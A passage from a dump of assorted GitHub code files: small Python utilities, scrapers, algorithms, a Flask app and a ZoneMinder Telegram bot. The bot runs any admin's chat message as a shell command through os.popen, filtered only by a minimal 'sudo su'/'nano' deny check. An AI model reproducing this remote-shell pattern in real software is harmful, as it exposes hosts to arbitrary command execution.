print(list(s))\n ss = SetADT()\n ss.add(4)\n ss.add(2)\n print(list(ss))\n print(list(s & ss))\n print(list(s - ss))\n print(list(s | ss))\n print(list(s ^ ss))\n\ntest_set_adt()","repo_name":"Frankssss/DataStructure-Algorithm","sub_path":"SetADT.py","file_name":"SetADT.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73411393106","text":"import json\nfrom django.http import HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef pagination(request, item, items_per_page):\n p = Paginator(item, items_per_page)\n page = request.GET.get('p')\n try:\n page = p.page(page)\n except PageNotAnInteger:\n page = p.page(1)\n except EmptyPage:\n page = None\n\n if request.GET.get('json'):\n data = []\n if page is not None:\n for i in page.object_list:\n item = {\n 'id': i.id,\n 'title': i.title,\n 'get_excerpt': i.get_excerpt(),\n 'get_absolute_url': i.get_absolute_url(),\n 'date': i.date.strftime(\"%d.%m.%Y\"),\n 'viewed': i.viewed,\n 'preview_image': i.get_preview_thumb()\n }\n data.append(item)\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n return page\n","repo_name":"ihormaslov/tips_diary","sub_path":"blog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22111247100","text":"import torch.optim as optim\nfrom ray import tune\n\n\ndef train_mnist(config):\n # train_loader, test_loader = get_data_loaders()\n # model = ConvNet()\n # optimizer = optim.SGD(model.parameters(), lr=config[\"lr\"])\n # for i in range(10):\n # train(model, optimizer, 
train_loader)\n # acc = test(model, test_loader)\n tune.track.log(mean_accuracy=0.5)\n print(config)\n\n\nanalysis = tune.run(\n train_mnist, config={\"lr\": tune.grid_search([0.001, 0.01, 0.1])})\n\nprint(\"Best config: \", analysis.get_best_config(metric=\"mean_accuracy\"))\n\n# Get a dataframe for analyzing trial results.\ndf = analysis.dataframe()\nprint(df)\n","repo_name":"ADGEfficiency/teaching-monolith","sub_path":"distributed-computing/ray/ray_tune.py","file_name":"ray_tune.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"48"} +{"seq_id":"16980720245","text":"import random as rand\nimport inspect\nfrom .models import Story as StoryTable\n\nclass Story:\n\n thisStory = None\n pk = None\n Story_text = None\n\n def __init__(self,PK):\n print(\"-----A Story object with pk %d was created-----\" % PK)\n\n global thisStory\n global pk\n\n pk = PK\n thisStory = StoryTable.objects.get(pk=pk)\n\n def getStoryArray(self):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n if(pk == -1):\n print(\"Feature coming soon. Please give a PK for the story you want\")\n\n return thisStory.story_array\n\n def parseStoryText(self):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n if(pk == -1):\n print(\"Feature coming soon. Please give a PK for the story you want\")\n\n storyInfo = thisStory.story_name + \"^\" + Story_text\n return storyInfo\n\n def injectWords(self,userInput):\n\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n global Story_text\n storyIndex = 0\n inputIndex = 0\n\n splitStory = thisStory.story_text.split('$')\n storyArray = thisStory.story_array.split(',')\n userInput = userInput.split(',')\n\n for token in splitStory:\n\n if (token == storyArray[inputIndex]):\n\n splitStory[storyIndex] = userInput[inputIndex]\n inputIndex = inputIndex + 1\n storyIndex = storyIndex + 1\n if(inputIndex == len(storyArray)):\n break\n\n storyIndex = 0\n inputIndex = 0\n finalStory = \"\"\n finalStory = finalStory.join(splitStory)\n\n Story_text = finalStory\n return finalStory\n\n def getPK(self):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n return pk\n\n def setPK(PK):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n global pk\n pk = PK\n return\n","repo_name":"janroddy/mad_lads","sub_path":"MadLads/MadLadParser/Story.py","file_name":"Story.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38905282793","text":"from datetime import timedelta\n\nfrom main import parse_date, module_deadline\nimport mc_submit\n\nclass CW_submission:\n def __init__(self, student_id,fullname, module_name, submission_date):\n self.student_id = student_id\n self.fullname = fullname\n self.module_name = module_name\n self.submission_date = submission_date\n\ndef submit():\n student_id_str = input(\"Enter Student ID: \")\n\n if not student_id_str.isnumeric():\n return None\n student_id = int(student_id_str)\n\n #get full name\n fullname = input(\"Enter Full Name: \")\n\n #get module name and validate\n module_name = input(\"Enter Module Name (CSF, IMOB, WT, ISDS): \")\n if not module_name.upper() in module_deadline.keys():\n return None\n\n #get submission date and validate\n str_date = input(\"Enter the date you are submitting the coursework.\"\n \"\\n(dd.mm.YYYY): \")\n if str_date == \"\" or str_date.isalpha():\n return None\n try:\n sub_date = 
parse_date(str_date)\n except:\n print(\"Enter in this format ===> (dd.mm.YYYY)\")\n return None\n\n #append to the list of submissions\n new_submission = CW_submission(student_id, fullname, module_name, sub_date)\n return new_submission\n\n\ndef check(cw_submission):\n deadline = module_deadline.get(cw_submission.module_name.upper())\n submission_date = cw_submission.submission_date\n if deadline < submission_date:\n #On time -> No\n if submission_date - deadline <= timedelta(days=1):\n #Within 24 hours?\n within_24hours(cw_submission)\n\n #Within 5days -> Yes\n elif submission_date - deadline <= timedelta(days=5):\n within_5days(cw_submission)\n\n else:\n #Within 5 days -> No\n after_5days(cw_submission)\n\n elif deadline >= submission_date:\n #On time -> Yes\n full_mark()\n\n#function for printing full mark\ndef full_mark():\n print(\"Your score is full mark of your assignment. No penalty\")\n\n#fucntion to subtract 10\ndef minus_10marks():\n print(\"Minus 10 marks from overall mark but not below 40\")\n\n#function to make mark 0\ndef mark_zero():\n print(\"Mark: 0\")\n\n#function to handle submissions within one day\ndef within_24hours(cw_submission):\n if check_valid_reason():\n mc_success = mc_submit.check(cw_submission)\n if mc_success:\n full_mark()\n else:\n minus_10marks()\n else:\n minus_10marks()\n\n#function to handle cases within 5 days\ndef within_5days(cw_submission):\n if check_valid_reason():\n mc_success = mc_submit.check(cw_submission)\n if mc_success:\n full_mark()\n else:\n mark_zero()\n else:\n mark_zero()\n\n#function to handle submissions after 5 days\ndef after_5days(cw_submission):\n if check_valid_reason():\n mc_success = mc_submit.check(cw_submission)\n if mc_success:\n print(\"Deferral Reassessment\")\n else:\n mark_zero()\n\n#to check valid reason\ndef check_valid_reason():\n while True:\n print(\"Is there a valid reason?\")\n answer = input(\"Yes/No\\n\")\n if answer.upper() == \"YES\":\n return True\n elif answer.upper() == \"NO\":\n return False\n else:\n print(\"Wrong Input. 
Type Yes or No!\")","repo_name":"westminster-bis/cw1-00012025","sub_path":"cw_submission.py","file_name":"cw_submission.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39396482326","text":"TILE_SIZE = 32\nFPS = 60\nWINDOW_WIDTH = 32 * TILE_SIZE\nWINDOW_HEIGHT = 16 * TILE_SIZE\n\nLEFT = -1\nRIGHT = 1\n\nPLAYER_GRAVITY = 2\nPLAYER_WIDTH = 32\nPLAYER_HEIGHT = 64\nPLAYER_JUMP_STRENGTH = 20\nPLAYER_SPEED = 5\nPLAYER_HEALTH = 100\n\n\nMAX_FALLING_SPEED = 10\n\nSPRITES_PATH = \"src/Assets/images/\"\nLEVELS_PATH = \"src/Assets/levels/lvl\"\n\nLEVEL_WIDTH = 128 * TILE_SIZE\nLEVEL_HEIGHT = 16 * TILE_SIZE\nSTARTING_POS = (2*TILE_SIZE, WINDOW_HEIGHT - 2*TILE_SIZE)\n\n","repo_name":"nwroblewski/python-game","sub_path":"src/Assets/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"35693947411","text":"from scrapy import Request\nfrom scrapy import Spider\nfrom scrapy.selector import Selector\nfrom scrapy import FormRequest\nfrom crawler.items import LaptopTCCItem\n# from selenium.webdriver.chrome.service import Service as ChromeService\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\n# from selenium.webdriver.chrome.webdriver import WebDriver as ChromeDriver\n# from webdriver_manager.chrome import ChromeDriverManager\n\nimport datetime\nimport uuid\nimport json\naa=1\n\n#
    \n\t\n\nclass CrawlerSpider(Spider):\n name = \"laptoptcc\"\n allowed_domains = [\"laptoptcc.com\"]\n start_urls = [\n \"https://laptoptcc.com/danh-muc/laptop/\",\n ]\n def __init__(self):\n options = Options()\n options.headless = True\n\n self.driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver_linux64',options=options)\n\n\n\n\n def parse(self, response):\n print(response.url)\n i=1\n links= Selector(response).xpath('//*[@id=\"main\"]/ul[contains(@class, \"products\")]/li/div/div/div[@class=\"product-loop-header\"]/a/@href')\n for link in links:\n print(i)\n i=i+1\n yield Request(url=link.get(), callback=self.parse_laptop)\n \n \n next_page = Selector(response).xpath(' //*[@id=\"main\"]/div[@class=\"shop-control-bar-bottom\"]/nav/ul/li/a[@class=\"next page-numbers\"]/@href').extract_first()\n print(\"*********\")\n print(len(links))\n print(next_page)\n print(\"************\")\n if next_page is not None:\n print(next_page)\n yield Request(next_page, callback=self.parse)\n # yield Request(url=\"https://laptoptcc.com/cua-hang/laptop-hp-elitebook-840-g5-i5-8350u-8gb-256gb-14-fhd/\", callback=self.parse_laptop)\n\n\n def parse_laptop(self, response):\n print(\"**************crawling \"+response.url+\"***********\")\n\n URL=response.url\n \n \n Name = Selector(response).xpath('//*[@id=\"content\"]/div[@class=\"container\"]/div[@class=\"site-content-inner\"]\\\n /div[@class=\"bg-wrapper\"]/div[@class=\"product-detail\"]/div[contains(@class,\"product\")]\\\n /div/div[@class=\"col-md-9\"]/div/h1[@class=\"product_title entry-title\"]/text()').get()\n \n self.driver.get(response.url)\n element = WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.ID, \"cau-hinh\"))\n )\n\n # options = self.driver.find_elements(By.XPATH, '//*[@id=\"cau-hinh\"]/option[contains(@class,\"attached\")]')\n wait = WebDriverWait(self.driver, 10)\n wait.until(EC.presence_of_element_located((By.XPATH, '//ul[@class=\"variable-items-wrapper button-variable-wrapper reselect-clear\"]/li')))\n li_tags = self.driver.find_elements(By.XPATH,'//ul[@class=\"variable-items-wrapper button-variable-wrapper reselect-clear\"]/li')\n\n for i in range(len(li_tags)):\n li = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.XPATH, f'//ul[@class=\"variable-items-wrapper button-variable-wrapper reselect-clear\"]/li[{i+1}]')))\n li.click()\n \n # self.driver.execute_script(\"arguments[0].setAttribute('aria-checked', 'true')\", li)\n wait = WebDriverWait(self.driver, 5)\n # html = self.driver.page_source\n # response = Selector(text=html)\n \n item = LaptopTCCItem()\n item['Name']= Name\n item['URL'] = URL \n item['Price'] = li.find_element(By.CLASS_NAME,\"price-mini\").text\n \n item['Ram'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Ram\")]').text\n item['Storage'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Ổ cứng\")]').text\n item['Display'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Màn hình\")]').text\n item['Graphics'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"VGA\")]').text\n item['Status'] = 
self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Tình trạng\")]').text\n item['CPU'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"CPU\")]').text\n # self.driver.execute_script(\"arguments[0].setAttribute('aria-checked', 'false')\", li)\n yield item\n\n\n def closed(self, reason):\n # Close the browser when the spider is done\n self.driver.quit() \n\n\n ","repo_name":"tranvietcuonghust/Laptop_Data_Integration","sub_path":"Scrapper/crawler/crawler/spiders/laptoptcc.py","file_name":"laptoptcc.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11516458835","text":"from datetime import datetime\n\n# How many days the video should cover. 1 <= days <= 28,\n# unless more files are downloaded.\ndays = 1\n\n\ndef main(urd):\n\n\t# Load background map from OpenStreetMap\n\ttiles = urd.build('osmtiles',\n\t\tlat=40.564, lon=-74.013,\n\t\tdeltalat=0.30, deltalon=0.20, zoom=12,\n\t\tcrop=((162, 103, 962, 1183)),\n\t\tresize=(667, 900),\n\t)\n\ttiles.link_result('map.png')\n\n\t# Import NYC COVID-19 statistics\n\tcases = urd.build('csvimport', filename='case-hosp-death.csv')\n\tcases = urd.build('dataset_type', source=cases, column2type=dict(\n\t\tDATE_OF_INTEREST='date:%m/%d/%Y',\n\t\tCASE_COUNT='number',\n\t))\n\tcases = urd.build('covidcases', source=cases)\n\n\t# Import and process zone polygons\n\tzones = urd.build('taxizones', filename='zones.json', tiles=tiles)\n\n\t# Create moving average for previous and current year\n\tma = []\n\tfor name, mindate, maxdate in (\n\t\t\t# offset in 2019/2020 dates since we want to compare mondays to mondays etc\n\t\t\t('previous', datetime(2019, 3, 3), datetime(2019, 3, 3 + days)),\n\t\t\t('current', datetime(2020, 3, 1), datetime(2020, 3, 1 + days))):\n\t\timpo = urd.peek('nyc', mindate.strftime('%Y-%m')).joblist.get(-1)\n\t\tprint('Input dataset is \"%s\"' % (impo,))\n\t\timp = urd.build('dataset_filter_columns', keep_columns=('stopdate10m', 'DOLocationID'), source=impo)\n\t\timp = urd.build('dataset_hashpart', hashlabel='stopdate10m', source=imp, length=1)\n\t\timp = urd.build('aggregate', source=imp, mindate=mindate, maxdate=maxdate)\n\t\tjob = urd.build('movingaverage', source=imp, Nbins=6, name=name + '_ma')\n\t\tma.append(job)\n\tjl = urd.joblist\n\ttrend = urd.build('tripratio', left=jl.get('previous_ma'), right=jl.get('current_ma'))\n\t# render all this data into images and then into a movie\n\tjob = urd.build('render', trend=trend, cases=cases, zones=zones, map_bg=tiles, ma=ma)\n\tjob = urd.build('frames2mp4', source=job, framesname='frames_inorder/frame_%05d.jpg', framerate=60)\n\tjob.link_result('out.mp4')\n\n\t# print(jl.print_exectimes())\n","repo_name":"exaxorg/pycon20-nyc-taxi-covid-movie","sub_path":"dev/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73243922067","text":"# Задача 1. 
\n \n\n# ingredient = {'Эспрессо': [1, 0, 0], 'Капучино': [1, 3, 0],\n# 'Маккиато': [2, 1, 0], 'Кофе по-венски': [1, 0, 2],\n# 'Латте Маккиато': [1, 2, 1], 'Кон Панна': [1, 0, 1]}\n \n \n# def choose_coffee(preferences):\n# for i in preferences:\n# if ingredient[i][0] <= ingredients[0] and ingredient[i][1] <= ingredients[1] \\\n# and ingredient[i][2] <= ingredients[2]:\n# ingredients[0] -= ingredient[i][0]\n# ingredients[1] -= ingredient[i][1]\n# ingredients[2] -= ingredient[i][2]\n# return i\n# return 'К сожалению, не можем предложить Вам напиток'\n\n \n# ingredients = []\n# ingredients = [1, 2, 3]\n# print(choose_coffee(\"Эспрессо, Капучино, Маккиато, Кофе по-венски, Латте Маккиато, Кон Панна\".split(\", \")))\n# print(choose_coffee(\"Эспрессо, Капучино, Маккиато, Кофе по-венски, Латте Маккиато, Кон Панна\".split(\", \")))\n\n# ingredients = [4, 4, 0]\n# print(choose_coffee(\"Капучино, Маккиато, Эспрессо\".split(\", \")))\n# print(choose_coffee(\"Капучино, Маккиато, Эспрессо\".split(\", \")))\n# print(choose_coffee(\"Капучино, Маккиато, Эспрессо\".split(\", \")))\n\n\n#Задача 2. \n\nsmall_symbols = \"абвгдеёжзийклмнопрстуфхцчшщъыьэюя\"\nbig_symbols = \"АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\n\n\ndef shift(text, symbols, n):\n index = symbols.find(text)\n if index + n < len(symbols):\n return symbols[index + n]\n else:\n return symbols[(index + n) % len(symbols)]\n\n \n\ndef back_shift(text, symbols, n):\n index = symbols.find(text)\n if index - n >= 0:\n return symbols[index - n]\n else: \n return symbols[(index - n) % len(symbols)]\n\n \n\ndef encrypt(text, n = 3):\n res = \"\"\n\n for i in range(0, len(text)): \n if text[i].isupper():\n res += shift(text[i], big_symbols, n)\n \n elif text[i].islower():\n res += shift(text[i], small_symbols, n)\n else:\n res += text[i]\n \n return res\n\n\ndef decrypt (text, n = 3):\n res = \"\"\n \n for i in range(0, len(text)):\n if text[i].isupper():\n res += back_shift(text[i], big_symbols, n)\n \n elif text[i].islower():\n res += back_shift(text[i], small_symbols, n)\n else:\n res += text[i]\n \n return res\n\n\n\nstr = encrypt(input())\nprint(str)\nprint(decrypt(str))","repo_name":"dmitrij77766/Python_homework8","sub_path":"Homework8.py","file_name":"Homework8.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24177083716","text":"#!/usr/bin/python\n\nimport argparse\n\nfrom wsgiref.simple_server import make_server\n\nfrom prometheus_client import make_wsgi_app, Metric, REGISTRY\n\nfrom Adafruit.Adafruit_BMP085 import BMP085\n\n\nPORT = 9091\n\n\nclass BMP180Collector():\n\n def collect(self):\n bmp = BMP085(0x77)\n temp = bmp.readTemperature()\n pressure = bmp.readPressure()\n\n temp_metric = Metric('bmp180_temp', 'BMP180 temperature', 'gauge')\n temp_metric.add_sample('bmp180_temp', value=temp, labels={})\n yield temp_metric\n\n pressure_metric = Metric('bmp180_pressure', 'BMP180 pressure', 'gauge')\n pressure_metric.add_sample('bmp180_pressure', value=pressure, labels={})\n yield pressure_metric\n\n\ndef main():\n parser = argparse.ArgumentParser(description='BMP180 exporter for Prometheus')\n parser.add_argument('-p', '--port', help=f'exporter exposed port (default {PORT})', type=int, default=PORT)\n args = parser.parse_args()\n\n REGISTRY.register(BMP180Collector())\n\n app = make_wsgi_app()\n httpd = make_server('', args.port, app)\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"jelly/prometheus-bmp180-exporter","sub_path":"prometheus-bmp180-exporter.py","file_name":"prometheus-bmp180-exporter.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2755249882","text":"#! /usr/bin/python3\nimport sys\n\n\ndef safe_tiles(row0, height):\n    width = len(row0)\n    traps = {x for (x, cell) in enumerate(row0) if cell == '^'}\n    safe = width - len(traps)\n    for y in range(1, height):\n        traps = {x for x in range(width)\n                 if len(traps & {x - 1, x + 1}) == 1}\n        safe += width - len(traps)\n    return safe\n\n\ndef main(input_file):\n    row0 = open(input_file).read().strip()\n    print(\"Part 1:\", safe_tiles(row0, 40))\n    print(\"Part 2:\", safe_tiles(row0, 400000))\n\n\nif __name__ == '__main__':\n    main(sys.argv[1])\n","repo_name":"davearussell/advent2016","sub_path":"day18/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"9824039957","text":"def merge_sort(nums_list=[]):\n\n    if len(nums_list) <= 1:\n        return nums_list\n\n    half_of_list = round(len(nums_list) / 2)\n    left_list = nums_list[:half_of_list]\n    right_list = nums_list[half_of_list:]\n\n    def _merge(left_list, right_list):\n        left_cursor = 0\n        right_cursor = 0\n        result_list = []\n        while(left_cursor < len(left_list) and right_cursor < len(right_list)):\n            if left_list[left_cursor] > right_list[right_cursor]:\n                result_list.append(right_list[right_cursor])\n                right_cursor += 1\n            else:\n                result_list.append(left_list[left_cursor])\n                left_cursor += 1\n        return result_list + left_list[left_cursor:] + right_list[right_cursor:]\n\n    return _merge(merge_sort(left_list), merge_sort(right_list))\n\n\nif __name__ == \"__main__\":\n    # test lists\n    nums_list = [4, 3, 6, 1, 7, 2, 9, 0, 8, 5, 0]\n    # nums_list = [4, 3, 6, 1, 7]\n    sorted_list = merge_sort(nums_list)\n    print(sorted_list)\n","repo_name":"vanyakulinich/algorithms","sub_path":"algorithms/mergeSort/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"36706807670","text":"from flask import Flask, render_template\n\napp = Flask(__name__,\n            static_url_path=\"\",\n            static_folder=\"static\",\n            template_folder=\"templates\"\n            )\n\n@app.route(\"/\")\ndef home():\n    return render_template('index.html')\n\n@app.errorhandler(400)\ndef error400(err):\n\te = {\n\t\t'number':'400',\n\t\t'description':'The request that this page has received is not valid. Perhaps your browser has been confused or you are using the wrong method to access this page.' \n\t}\n\treturn render_template('error.html', title='400', error=e), 400\n\n@app.errorhandler(401)\ndef error401(err):\n\te = {\n\t\t'number':'401',\n\t\t'description':'We are sorry, but you do not have authorization to access this page.' \n\t}\n\treturn render_template('error.html', title='401', error=e), 401\n\n@app.errorhandler(403)\ndef error403(err):\n\te = {\n\t\t'number':'403',\n\t\t'description':'We are sorry but access to this page is prohibited. Contact an administrator to grant you access.' \n\t}\n\treturn render_template('error.html', title='403', error=e), 403\n\n@app.errorhandler(404)\ndef error404(err):\n\te = {\n\t\t'number':'404',\n\t\t'description':'We could not find the page you are looking for, perhaps you have misspelled the link or the page is private.' 
\n\t}\n\treturn render_template('error.html', title='404', error=e), 404\n\n@app.errorhandler(500)\ndef error500(err):\n\te = {\n\t\t'number':'500',\n\t\t'description':'Do not worry, this error is not your fault. There has been an internal error on our server. We are trying to fix it.' \n\t}\n\treturn render_template('error.html', title='500', error=e), 500\n\nif __name__ == \"__main__\":\n    # Important: disable this in production\n    app.run(debug=True)\n","repo_name":"pythonmurcia/gitcollab","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"}
+{"seq_id":"25946751181","text":"#!/usr/bin/python3\nimport sys\n\n\ndef safe_function(fct, *args):\n    from sys import stderr\n    try:\n        ans = fct(*args)\n        return (ans)\n    except (TypeError, ZeroDivisionError, IndexError):\n        print(\"Exception: {}\".format(sys.exc_info()[1]), file=stderr)\n        return (None)\n","repo_name":"davidajimati/alx-higher_level_programming","sub_path":"0x05-python-exceptions/101-safe_function.py","file_name":"101-safe_function.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"34815388109","text":"def get_grade(s1, s2, s3):\n    av = s1+s2+s3\n    average = av/3\n    if 90<=average<=100:\n        return \"A\"\n    elif 80 <= average < 90:\n        return \"B\"\n    elif 70 <= average < 80:\n        return \"C\"\n    elif 60 <= average < 70:\n        return \"D\"\n    elif 0 <= average < 60:\n        return \"F\"\n\nprint(get_grade(90,90,80))","repo_name":"mutheud/calculator","sub_path":"average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"16451045795","text":"import os\nimport subprocess\n\nfrom setuptools import find_packages, setup\nfrom torch.utils.cpp_extension import BuildExtension, CUDAExtension\n\ndef make_cuda_ext(name, module, sources):\n    cuda_ext = CUDAExtension(\n        name='%s.%s' % (module, name),\n        sources=[os.path.join(*module.split('.'), src) for src in sources]\n    )\n    return cuda_ext\n    \nif __name__ == '__main__':\n    setup(\n        cmdclass={'build_ext': BuildExtension},\n        ext_modules=[\n            make_cuda_ext(\n                name='iou3d_nms_cuda',\n                module='iou3d_nms',\n                sources=[\n                    'src/iou3d_cpu.cpp',\n                    'src/iou3d_nms_api.cpp',\n                    'src/iou3d_nms.cpp',\n                    'src/iou3d_nms_kernel.cu',\n                ]\n            ),],)\n","repo_name":"mariya12290/VoxelNet_Multilabel_MasterThesis","sub_path":"model/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"20833666425","text":"import sys\nimport os\nimport telepot\nimport datetime\nimport time\nimport urllib3\nimport io\nimport configparser\nfrom PIL import Image\nimport requests\nfrom io import BytesIO as ioBytes\nimport traceback\n\n\"\"\"\nCtrl-C to exit.\n\"\"\"\n\nhttp = urllib3.PoolManager()\nconfigParser = configparser.RawConfigParser()\nconfigFilePath = r'./cameras.conf'\nconfigParser.read(configFilePath)\n\ncameraList = configParser['CAMERAS']\ncommandList = configParser['ZM_COMMANDS']\nauthorizedChatIds = configParser['TELEGRAM_AUTHORIZED_CHAT_IDS']['IDS']\nbotToken = configParser['TELEGRAM_BOT_TOKEN']['AUTH_TOKEN']\nadminChatIds = configParser['TELEGRAM_ADMIN_CHAT_IDS']['IDS']\n\n\ndef handle(msg):\n    chat_id = msg['chat']['id']\n    command = msg['text']\n    sender = 
str(msg['from']['id'])\n    normalizedCommand = command.upper()\n\n    print('Got command: %s' % command)\n\n    if sender in authorizedChatIds:\n        if normalizedCommand in cameraList:\n            print(\"Received as Camera\")\n            url = cameraList[command]\n            try:\n                response = requests.get(url)\n                bot.sendPhoto(chat_id=chat_id,\n                              photo=io.BytesIO(response.content))\n            except:\n                traceback.print_exc()\n                bot.sendMessage(\n                    chat_id, 'Unable to connect to camera ' + command)\n        elif normalizedCommand in commandList:\n            print(\"Received as Action\")\n            cmd = commandList[normalizedCommand]\n            res = os.popen(cmd).read()\n            message = os.popen(\n                \"sudo service zoneminder status | head -3 | tail -1 | cut -f2 -d'(' | cut -f1 -d')'\").read()\n            bot.sendMessage(chat_id, message)\n\n        elif sender in adminChatIds and len(command) > 1 and command != \"sudo su\" and \"nano\" not in command:\n            try:\n                message = os.popen(command).read()\n                bot.sendMessage(chat_id, message)\n            except:\n                bot.sendMessage(chat_id, \"invalid command\")\n        else:\n            print(\"Wrong message\")\n            bot.sendMessage(chat_id, \"Command not recognized\")\n    else:\n        bot.sendMessage(\n            chat_id, 'You are not authorized to give me orders! Your chat code is: ' + sender)\n\n\nprint(\"Bot Token: \" + botToken)\nbot = telepot.Bot(botToken)\nbot.message_loop(handle)\n\nprint('I am listening ...')\n\nwhile 1:\n    time.sleep(10000)\n","repo_name":"fedegovoni/alarm","sub_path":"zm_server/bot_telegram.py","file_name":"bot_telegram.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"16588526322","text":"class TreeNode():\n    def __init__(self):\n        self.left = None\n        self.data = None\n        self.right = None\n\nmemory = []\nroot = None\nnameAry = ['Haruhi', 'Yuki', 'Kyon', 'Mikuru', 'Koizumi']\n\nnode = TreeNode()\nnode.data = nameAry[0]\nroot = node\nmemory.append(node)\n\nfor name in nameAry[1:]:\n    node = TreeNode()\n    node.data = name\n\n    current = root\n    while True:\n        if name < current.data :\n            if current.left == None:\n                current.left = node\n                break\n            else:\n                current = current.left\n        else:\n            if current.right == None:\n                current.right = node\n                break\n            else:\n                current = current.right\n\n    memory. 
append(node)\n\nprint(\"Binary search tree complete\")\n\nfindName= 'Kyona'\n\ncurrent = root\nwhile True:\n    if (findName == current.data):\n        print(findName, 'is a member of the SOS Brigade')\n        break\n    elif (findName < current.data):\n        if (current.left == None):\n            print('No such person')\n            break\n        current = current.left\n    else:\n        if (current.right == None):\n            print('No such person')\n            break\n        current = current.right","repo_name":"junhokim42/Python_study","sub_path":"Bigdata_training/Python_class/day13/Code_10.py","file_name":"Code_10.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
